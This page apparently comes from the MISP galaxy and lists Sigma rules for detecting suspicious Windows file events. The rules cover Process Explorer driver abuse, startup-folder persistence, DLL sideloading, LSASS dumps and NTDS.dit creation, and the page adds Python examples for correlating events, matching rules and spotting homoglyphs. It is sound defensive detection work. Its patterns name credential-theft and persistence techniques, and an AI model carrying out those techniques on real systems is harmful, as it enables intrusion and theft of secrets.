Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges: they drop it to disk for a few moments, run a service using that driver, and remove it afterwards.
Internal MISP references
UUID de46c52b-0bf8-4936-a327-aace94f94ac6 which can be used as unique global reference for Process Explorer Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy
External references
- https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks - webarchive
- https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/ - webarchive
- https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer - webarchive
- https://github.com/Yaxser/Backstab - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2023-05-05 |
| falsepositive | ['Some false positives may occur with legitimate renamed process explorer binaries'] |
| filename | file_event_win_sysinternals_procexp_driver_susp_creation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1068'] |
Related clusters
To see the related clusters, click here.
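The entry above describes a three-step lifecycle (driver written by something other than procexp, a service started on it, the file removed again); the Sigma rule itself only needs the first step. The following is an added example, not code from SigmaHQ or from the MISP galaxy, that correlates all three steps over constructed event records so an analyst sees the whole chain in one finding. The driver filename (PROCEXP152.SYS), the procexp image names, the five-minute window and the events are assumptions and constructed data, not values taken from the published rule.

```python
"""Correlate the Process Explorer driver drop / service / delete chain.

Added example, not the SigmaHQ rule. The rule fires on the first stage alone
(driver file written by a non-procexp image); this goes further and ties that
write to a service installation and the later deletion. Driver and image
names below are assumptions; the events are constructed, not real telemetry.
"""
from datetime import datetime, timedelta

SYSINTERNALS_IMAGES = ("\\procexp.exe", "\\procexp64.exe")   # assumption
DRIVER_NAMES = ("\\procexp152.sys",)                          # assumption


def is_procexp_driver(path: str) -> bool:
    """Does the written file carry the Process Explorer driver name?"""
    return path.lower().endswith(DRIVER_NAMES)


def written_by_procexp(image: str) -> bool:
    """Legitimate case: Process Explorer itself extracting its own driver."""
    return image.lower().endswith(SYSINTERNALS_IMAGES)


def correlate(events, window=timedelta(minutes=5)):
    """One finding per driver write by a non-procexp image.

    stages_matched counts: 1 = the write itself (what the Sigma rule detects),
    2 = a service registered with that file as ImagePath inside the window,
    3 = the file deleted again inside the window (the "few moments" pattern).
    """
    findings = []
    ordered = sorted(events, key=lambda e: e["ts"])
    for ev in ordered:
        if ev["type"] != "FileCreate":
            continue
        if not is_procexp_driver(ev["TargetFilename"]) or written_by_procexp(ev["Image"]):
            continue
        path = ev["TargetFilename"].lower()
        later = [x for x in ordered if ev["ts"] < x["ts"] <= ev["ts"] + window]
        service = next(
            (x for x in later
             if x["type"] == "ServiceInstall" and path in x["ImagePath"].lower()),
            None,
        )
        deleted = any(
            x["type"] == "FileDelete" and x["TargetFilename"].lower() == path
            for x in later
        )
        findings.append({
            "dropper": ev["Image"],
            "driver": ev["TargetFilename"],
            "service": service["ServiceName"] if service else None,
            "deleted": deleted,
            "stages_matched": 1 + (service is not None) + deleted,
        })
    return findings


# Constructed sample stream (Sysmon-style file events plus a 7045-style
# service install); not real telemetry.
T0 = datetime(2024, 1, 15, 10, 0, 0)
EVENTS = [
    {"ts": T0, "type": "FileCreate",
     "Image": r"C:\Users\bob\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Windows\Temp\PROCEXP152.SYS"},
    {"ts": T0 + timedelta(seconds=2), "type": "ServiceInstall",
     "ServiceName": "PROCEXP152",
     "ImagePath": r"\??\C:\Windows\Temp\PROCEXP152.SYS"},
    {"ts": T0 + timedelta(seconds=15), "type": "FileDelete",
     "Image": r"C:\Users\bob\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Windows\Temp\PROCEXP152.SYS"},
    # benign: the real Process Explorer dropping its own driver, skipped
    {"ts": T0 + timedelta(hours=1), "type": "FileCreate",
     "Image": r"C:\Tools\procexp64.exe",
     "TargetFilename": r"C:\Windows\System32\drivers\PROCEXP152.SYS"},
]

if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding)
```

The first stage on its own is what the rule reports; a finding with all three stages matched inside a short window is the EDR-killer pattern the linked Sophos and Elastic write-ups describe, and is worth a higher triage priority than a lone driver write by a renamed procexp binary (the rule's stated false positive).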
Creation of WerFault.exe/Wer.dll in Unusual Folder
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
Internal MISP references
UUID 28a452f3-786c-4fd8-b8f2-bddbe9d616d1 which can be used as unique global reference for Creation of WerFault.exe/Wer.dll in Unusual Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-09 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_werfault_dll_hijacking.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001'] |
Related clusters
To see the related clusters, click here.
WMI Persistence - Script Event Consumer File Write
Detects file writes by a WMI script event consumer.
Internal MISP references
UUID 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4 which can be used as unique global reference for WMI Persistence - Script Event Consumer File Write in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Thomas Patzke |
| creation_date | 2018-03-07 |
| falsepositive | ['Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)'] |
| filename | file_event_win_wmi_persistence_script_event_consumer_write.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.t1546.003', 'attack.persistence'] |
Related clusters
To see the related clusters, click here.
Suspicious Startup Folder Persistence
Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.
Internal MISP references
UUID 28208707-fe31-437f-9a7f-4b1108b94d2e which can be used as unique global reference for Suspicious Startup Folder Persistence in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/5ede8f21e42ebe37e0a6eff757dba60bcfa85859/atomics/T1547.001/T1547.001.md - webarchive
- https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/ - webarchive
- https://github.com/last-byte/PersistenceSniper - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2022-08-10 |
| falsepositive | ['Rare legitimate usage of some of the extensions mentioned in the rule'] |
| filename | file_event_win_susp_startup_folder_persistence.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.t1204.002', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Startup Folder File Write
A general detection for files being created in the Windows startup directory. This could be an indicator of persistence.
Internal MISP references
UUID 2aa0a6b4-a865-495b-ab51-c28249537b75 which can be used as unique global reference for Startup Folder File Write in MISP communities and other software using the MISP galaxy
External references
- https://github.com/OTRF/detection-hackathon-apt29/issues/12 - webarchive
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-05-02 |
| falsepositive | ['FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate'] |
| filename | file_event_win_startup_folder_file_write.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
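The two startup-folder entries above differ only in selectivity: one fires on any write into a Startup folder, the other only on script and executable extensions. The following is an added example, not code from SigmaHQ or from the MISP galaxy, that implements a minimal Sigma-style matcher for file_event records and runs both rule shapes over constructed Sysmon Event ID 11 (FileCreate) records. The rule bodies are hypothetical approximations of the descriptions, not the published YAML; the msiexec filter, the extensions beyond .ps1/.vbs/.js/.bat and the events are assumptions and constructed data.

```python
"""Minimal Sigma-style matcher for Windows file_event records.

Added example, not code from SigmaHQ or the MISP galaxy. Supports the
Sigma map semantics used here: fields in a selection are ANDed, a list of
values for one field is ORed, Windows string fields compare
case-insensitively, and the condition is either "selection" or
"selection and not filter". The two rules are approximations of the page's
descriptions (assumptions); events are constructed, not real telemetry.
"""

# Common tail of both per-user and all-users Startup folders
# (%APPDATA%\...\Startup and %ProgramData%\...\StartUp).
STARTUP_DIR = "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\"

RULES = [
    {
        "title": "Startup Folder File Write",
        "level": "medium",
        "detection": {
            "selection": {"TargetFilename|contains": STARTUP_DIR},
            "condition": "selection",
        },
    },
    {
        "title": "Suspicious Startup Folder Persistence",
        "level": "high",
        "detection": {
            "selection": {
                "TargetFilename|contains": STARTUP_DIR,
                "TargetFilename|endswith": [".ps1", ".vbs", ".js", ".bat",
                                            ".cmd", ".hta", ".exe", ".dll"],
            },
            # hypothetical tuning for the "rare legitimate usage" false positive
            "filter": {"Image|endswith": "\\msiexec.exe"},
            "condition": "selection and not filter",
        },
    },
]


def match_selection(selection: dict, event: dict) -> bool:
    """Every field spec must match; a list of values is an OR."""
    for spec, wanted in selection.items():
        field, _, modifier = spec.partition("|")
        value = str(event.get(field, "")).lower()
        options = wanted if isinstance(wanted, list) else [wanted]
        options = [str(o).lower() for o in options]
        if modifier == "contains":
            ok = any(o in value for o in options)
        elif modifier == "endswith":
            ok = any(value.endswith(o) for o in options)
        elif modifier == "startswith":
            ok = any(value.startswith(o) for o in options)
        elif modifier == "":
            ok = value in options
        else:
            raise ValueError(f"unsupported modifier: {modifier!r}")
        if not ok:
            return False
    return True


def evaluate(rule: dict, event: dict) -> bool:
    """Apply the rule's condition to one event."""
    det = rule["detection"]
    hit = match_selection(det["selection"], event)
    if det["condition"] == "selection and not filter":
        return hit and not match_selection(det["filter"], event)
    return hit


def run_rules(rules, events):
    """Return (event id, rule title) for every rule that fires."""
    return [(e["id"], r["title"]) for e in events for r in rules if evaluate(r, e)]


# Constructed Sysmon EID 11 records (assumed field names Image/TargetFilename).
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Slack.lnk"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"id": 3, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\agent.bat"},
    {"id": 4, "Image": r"C:\Users\alice\Downloads\setup.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\update.vbs"},
]

if __name__ == "__main__":
    for hit in run_rules(RULES, EVENTS):
        print(hit)
```

Event 1 (a shortcut dropped by explorer.exe) trips only the medium-level general rule, which is exactly the false positive its metadata warns about; event 2 trips both; event 3 is suppressed by the installer filter in the high-level rule but still surfaces in the general one, which is why the general rule's note asks for the folder to be inspected rather than the alert dismissed.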
PsExec Service File Creation
Detects the default PsExec service filename, which indicates PsExec service installation and execution.
Internal MISP references
UUID 259e5a6a-b8d2-4c38-86e2-26c5e651361d which can be used as unique global reference for PsExec Service File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Thomas Patzke |
| creation_date | 2017-06-12 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_sysinternals_psexec_service.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002', 'attack.s0029'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Microsoft Office Add-In
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll and .xll files are simply DLLs built for Word or Excel).
Internal MISP references
UUID 8e1cb247-6cf6-42fa-b440-3f27d57e9936 which can be used as unique global reference for Potential Persistence Via Microsoft Office Add-In in MISP communities and other software using the MISP galaxy
External references
- Internal Research
- https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | NVISO |
| creation_date | 2020-05-11 |
| falsepositive | ['Legitimate add-ins'] |
| filename | file_event_win_office_addin_persistence.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137.006'] |
Related clusters
To see the related clusters, click here.
OneNote Attachment File Dropped In Suspicious Location
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
Internal MISP references
UUID 7fd164ba-126a-4d9c-9392-0d4f7c243df0 which can be used as unique global reference for OneNote Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - webarchive
- https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-22 |
| falsepositive | ['Legitimate usage of ".one" or ".onepkg" files from those locations'] |
| filename | file_event_win_office_onenote_files_in_susp_locations.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious DotNET CLR Usage Log Artifact
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.
Internal MISP references
UUID e0b06658-7d1d-4cd3-bf15-03467507ff7c which can be used as unique global reference for Suspicious DotNET CLR Usage Log Artifact in MISP communities and other software using the MISP galaxy
External references
- https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ - webarchive
- https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml - webarchive
- https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html - webarchive
- https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, omkar72, oscd.community, Wojciech Lesicki |
| creation_date | 2022-11-18 |
| falsepositive | ['Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675'] |
| filename | file_event_win_net_cli_artefact.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
NTDS.DIT Created
Detects creation of a file named "ntds.dit" (Active Directory Database)
Internal MISP references
UUID 0b8baa3f-575c-46ee-8715-d6f28cc7d33c which can be used as unique global reference for NTDS.DIT Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-05 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_ntds_dit_creation.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
Related clusters
To see the related clusters, click here.
PSScriptPolicyTest Creation By Uncommon Process
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft PowerShell to test against AppLocker.
Internal MISP references
UUID 1027d292-dd87-4a1a-8701-2abe04d7783c which can be used as unique global reference for PSScriptPolicyTest Creation By Uncommon Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-01 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Potential Winnti Dropper Activity
Detects files dropped by Winnti as described in RedMimicry Winnti playbook
Internal MISP references
UUID 130c9e58-28ac-4f83-8574-0a4cc913b97e which can be used as unique global reference for Potential Winnti Dropper Activity in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Alexander Rausch |
| creation_date | 2020-06-24 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_redmimicry_winnti_filedrop.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027'] |
Related clusters
To see the related clusters, click here.
UEFI Persistence Via Wpbbin - FileCreation
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method.
Internal MISP references
UUID e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f which can be used as unique global reference for UEFI Persistence Via Wpbbin - FileCreation in MISP communities and other software using the MISP galaxy
External references
- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - webarchive
- https://persistence-info.github.io/Data/wpbbin.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-18 |
| falsepositive | ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)'] |
| filename | file_event_win_wpbbin_persistence.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1542.001'] |
Related clusters
To see the related clusters, click here.
PDF File Created By RegEdit.EXE
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
Internal MISP references
UUID 145095eb-e273-443b-83d0-f9b519b7867b which can be used as unique global reference for PDF File Created By RegEdit.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-07-08 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_regedit_print_as_pdf.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
PowerShell Module File Created By Non-PowerShell Process
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
Internal MISP references
UUID e3845023-ca9a-4024-b2b2-5422156d5527 which can be used as unique global reference for PowerShell Module File Created By Non-PowerShell Process in MISP communities and other software using the MISP galaxy
External references
- Internal Research
- https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-09 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_powershell_module_uncommon_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
PCRE.NET Package Temp Files
Detects processes creating temp files related to PCRE.NET package
Internal MISP references
UUID 6e90ae7a-7cd3-473f-a035-4ebb72d961da which can be used as unique global reference for PCRE.NET Package Temp Files in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-10-29 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_pcre_net_temp_file.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Potential DCOM InternetExplorer.Application DLL Hijack
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
Internal MISP references
UUID 2f7979ae-f82b-45af-ac1d-2b10e93b0baa which can be used as unique global reference for Potential DCOM InternetExplorer.Application DLL Hijack in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga |
| creation_date | 2020-10-12 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_dcom_iertutil_dll_hijack.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.002', 'attack.t1021.003'] |
Related clusters
To see the related clusters, click here.
Adwind RAT / JRAT File Artifact
Detects javaw.exe in AppData folder as used by Adwind / JRAT
Internal MISP references
UUID 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 which can be used as unique global reference for Adwind RAT / JRAT File Artifact in MISP communities and other software using the MISP galaxy
External references
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf - webarchive
- https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community |
| creation_date | 2017-11-10 |
| falsepositive | No established falsepositives |
| filename | file_event_win_mal_adwind.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.005', 'attack.t1059.007'] |
Related clusters
To see the related clusters, click here.
TeamViewer Remote Session
Detects the creation of log files during a TeamViewer remote session
Internal MISP references
UUID 162ab1e4-6874-4564-853c-53ec3ab8be01 which can be used as unique global reference for TeamViewer Remote Session in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-30 |
| falsepositive | ['Legitimate uses of TeamViewer in an organisation'] |
| filename | file_event_win_susp_teamviewer_remote_session.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
To see the related clusters, click here.
Malicious DLL File Dropped in the Teams or OneDrive Folder
Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications are installed. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded.
Internal MISP references
UUID 1908fcc1-1b92-4272-8214-0fbaf2fa5163 which can be used as unique global reference for Malicious DLL File Dropped in the Teams or OneDrive Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-12 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_iphlpapi_dll_sideloading.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.001'] |
Related clusters
To see the related clusters, click here.
Potential Homoglyph Attack Using Lookalike Characters in Filename
Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.
Internal MISP references
UUID 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6 which can be used as unique global reference for Potential Homoglyph Attack Using Lookalike Characters in Filename in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Micah Babinski, @micahbabinski |
| creation_date | 2023-05-08 |
| falsepositive | ['File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.'] |
| filename | file_event_win_susp_homoglyph_filename.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036', 'attack.t1036.003'] |
Related clusters
To see the related clusters, click here.
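The entry above flags "perfect" homoglyphs and warns that legitimate Cyrillic filenames will trip it. The following is an added example, not code from SigmaHQ or from the MISP galaxy, that shows what such a check looks like and one way to apply the tuning the false-positive note asks for: treat a name as suspicious only when a single run of letters mixes ASCII with lookalikes, and leave all-Cyrillic or all-Greek names alone. The lookalike table is a hand-picked subset (an assumption, not the rule's list), and the sample names are constructed.

```python
"""Find perfect Unicode homoglyphs in filenames and separate mixed-script
names from legitimate non-Latin text.

Added example, not the published Sigma rule. HOMOGLYPHS is an assumed subset
of Cyrillic and Greek letters whose glyphs are indistinguishable from ASCII
letters in common fonts; extend it to match the rule's own list.
"""
import re
import unicodedata

# perfect homoglyph -> the ASCII letter it impersonates (subset; assumption)
HOMOGLYPHS = {
    # Cyrillic lowercase
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    # Cyrillic uppercase
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",
    # Greek
    "\u03bf": "o", "\u0391": "A", "\u0392": "B", "\u0395": "E", "\u0397": "H",
    "\u039a": "K", "\u039c": "M", "\u039d": "N", "\u039f": "O", "\u03a1": "P",
    "\u03a4": "T", "\u03a7": "X", "\u0396": "Z",
}

LETTER_RUN = re.compile(r"[^\W\d_]+")   # runs of letters in any script


def find_homoglyphs(name: str):
    """(position, character, ASCII lookalike) for every homoglyph in name."""
    return [(i, ch, HOMOGLYPHS[ch]) for i, ch in enumerate(name) if ch in HOMOGLYPHS]


def ascii_equivalent(name: str) -> str:
    """What the name looks like on screen, with homoglyphs folded to ASCII."""
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in name)


def mixed_script_tokens(name: str):
    """Letter runs that contain both an ASCII letter and a homoglyph.

    A run such as 'svch\u043est' mixes scripts; '\u043e\u0442\u0447\u0451\u0442'
    (all Cyrillic) does not, even though it contains lookalike letters.
    """
    mixed = []
    for token in LETTER_RUN.findall(name):
        has_ascii = any(ch.isascii() and ch.isalpha() for ch in token)
        has_glyph = any(ch in HOMOGLYPHS for ch in token)
        if has_ascii and has_glyph:
            mixed.append(token)
    return mixed


def survives_nfkc(name: str) -> bool:
    """True when Unicode compatibility normalisation leaves the name intact.

    Perfect homoglyphs are ordinary base letters, so NFKC does not fold them;
    relying on normalisation alone would miss them entirely.
    """
    return unicodedata.normalize("NFKC", name) == name


def classify(name: str) -> str:
    """clean | non-latin (lookalikes only inside non-ASCII runs) | suspicious"""
    if not find_homoglyphs(name):
        return "clean"
    return "suspicious" if mixed_script_tokens(name) else "non-latin"


def triage(names):
    """Map each filename to its classification."""
    return {n: classify(n) for n in names}


# constructed sample names
SAMPLES = [
    "Invoice_2024.pdf",                       # plain ASCII
    "svch\u043est.exe",                       # Cyrillic o in an English word
    "\u043e\u0442\u0447\u0451\u0442.docx",    # legitimate Cyrillic "отчёт"
    "\ufb01le.exe",                           # 'fi' ligature: NFKC folds this one
]

if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{verdict:10} {ascii_equivalent(name)!r:24} nfkc-stable={survives_nfkc(name)}")
```

The ligature sample is there for contrast: compatibility characters such as U+FB01 are folded by NFKC and are caught by normalisation, whereas the Cyrillic lookalikes survive it unchanged, which is precisely why a table-driven check is needed.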
WerFault LSASS Process Memory Dump
Detects WerFault creating a dump file with a name that indicates it could be a dump of LSASS process memory, which contains user credentials.
Internal MISP references
UUID c3e76af5-4ce0-4a14-9c9a-25ceb8fda182 which can be used as unique global reference for WerFault LSASS Process Memory Dump in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-06-27 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_lsass_werfault_dump.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Related clusters
To see the related clusters, click here.
